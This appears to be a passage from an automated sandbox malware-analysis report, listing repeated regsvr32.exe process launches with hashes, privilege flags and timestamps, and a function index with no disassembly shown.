Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffcb0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 08:25:05 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffcb0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 08:25:06 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffcb0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 08:25:06 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffcb0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 08:25:07 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffcb0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|
Executed Functions |
---|
Non-executed Functions |
---|
Function 02E966F3, Relevance: .9, Instructions: 946COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02E966E8, Relevance: .9, Instructions: 935COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02E96753, Relevance: .9, Instructions: 925COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02E96743, Relevance: .9, Instructions: 909COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02E9CF01, Relevance: .6, Instructions: 623COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02E96340, Relevance: .4, Instructions: 355COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |